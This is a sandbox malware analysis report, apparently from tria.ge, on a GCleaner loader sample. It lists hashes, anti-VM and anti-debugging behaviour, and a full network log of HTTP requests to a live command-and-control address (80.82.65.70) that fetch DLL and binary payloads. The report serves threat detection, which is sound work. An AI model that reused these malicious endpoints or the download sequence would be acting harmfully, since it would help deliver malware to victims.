Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/12/2024, 05:52 UTC

General

  • Target

    file.exe

  • Size

    1.9MB

  • MD5

    ae289ab30dfebf9432c69040df09a610

  • SHA1

    6039324f5b9ff482f2111b0fe1427c6b0aa64c14

  • SHA256

    d6f64f42200504958f0d75af57b0766aab46ac3ccd770cb1e5cc91927579d9fb

  • SHA512

    8165695a7160d1be996c2fb17eb157bf0dfdfc451029c7879db5de0876d4e9c623ef0842b134a1bcc4ff58109abe242f03a8f76b68a7159b4b5ea56e5a3204f3

  • SSDEEP

    49152:avuT7x1eCVwcjoPhV/s9QapGNoGLb9AIETMhdZ:avGx1eHcqD09MoG1v

Malware Config

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:4192
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1460
      2⤵
      • Program crash
      PID:2440
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4192 -ip 4192
    1⤵
      PID:3076

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      76.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      76.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-nl
      GET
      http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: 1
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:25 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/dll/key
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /dll/key HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: 1
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:25 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 21
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/dll/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /dll/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: 1
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:26 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
      Content-Length: 97296
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: application/octet-stream
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:26 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:28 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=96
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:30 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=95
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:32 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=94
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:34 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=93
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:37 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=92
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:39 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=91
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:41 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=90
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:43 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=89
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:45 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=88
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:47 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=87
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/soft/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /soft/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: d
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:51 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Disposition: attachment; filename="dll";
      Content-Length: 242176
      Keep-Alive: timeout=5, max=86
      Connection: Keep-Alive
      Content-Type: application/octet-stream
    • flag-nl
      GET
      http://80.82.65.70/soft/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /soft/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: s
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:51 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Disposition: attachment; filename="soft";
      Content-Length: 1502720
      Keep-Alive: timeout=5, max=85
      Connection: Keep-Alive
      Content-Type: application/octet-stream
    • flag-us
      DNS
      70.65.82.80.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      70.65.82.80.in-addr.arpa
      IN PTR
      Response
      70.65.82.80.in-addr.arpa
      IN PTR
      security criminalipcom
    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      200.163.202.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.163.202.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      134.71.91.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      134.71.91.104.in-addr.arpa
      IN PTR
      Response
      134.71.91.104.in-addr.arpa
      IN PTR
      a104-91-71-134deploystaticakamaitechnologiescom
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
      Response
      83.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-83deploystaticakamaitechnologiescom
    • flag-us
      DNS
      22.49.80.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      22.49.80.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 80.82.65.70:80
      http://80.82.65.70/soft/download
      http
      file.exe
      70.2kB
      1.9MB
      1391
      1389

      HTTP Request

      GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/dll/key

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/dll/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/files/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/soft/download

      HTTP Response

      200

      HTTP Request

      GET http://80.82.65.70/soft/download

      HTTP Response

      200
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      172.214.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.214.232.199.in-addr.arpa

    • 8.8.8.8:53
      241.150.49.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      241.150.49.20.in-addr.arpa

    • 8.8.8.8:53
      76.32.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      76.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      70.65.82.80.in-addr.arpa
      dns
      70 B
      107 B
      1
      1

      DNS Request

      70.65.82.80.in-addr.arpa

    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      200.163.202.172.in-addr.arpa
      dns
      74 B
      160 B
      1
      1

      DNS Request

      200.163.202.172.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      134.71.91.104.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      134.71.91.104.in-addr.arpa

    • 8.8.8.8:53
      83.210.23.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      83.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      22.49.80.91.in-addr.arpa
      dns
      70 B
      145 B
      1
      1

      DNS Request

      22.49.80.91.in-addr.arpa

    • 8.8.8.8:53
      29.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      29.243.111.52.in-addr.arpa

    • 8.8.8.8:53

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FQRZN8O7\download[1].htm

      Filesize

      1B

      MD5

      cfcd208495d565ef66e7dff9f98764da

      SHA1

      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

      SHA256

      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

      SHA512

      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    • memory/4192-15-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-18-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-3-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-4-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-6-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-7-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-11-0x0000000010000000-0x000000001001C000-memory.dmp

      Filesize

      112KB

    • memory/4192-0-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-2-0x0000000000401000-0x0000000000427000-memory.dmp

      Filesize

      152KB

    • memory/4192-20-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-17-0x0000000000401000-0x0000000000427000-memory.dmp

      Filesize

      152KB

    • memory/4192-21-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-1-0x0000000077854000-0x0000000077856000-memory.dmp

      Filesize

      8KB

    • memory/4192-23-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-28-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-34-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-40-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.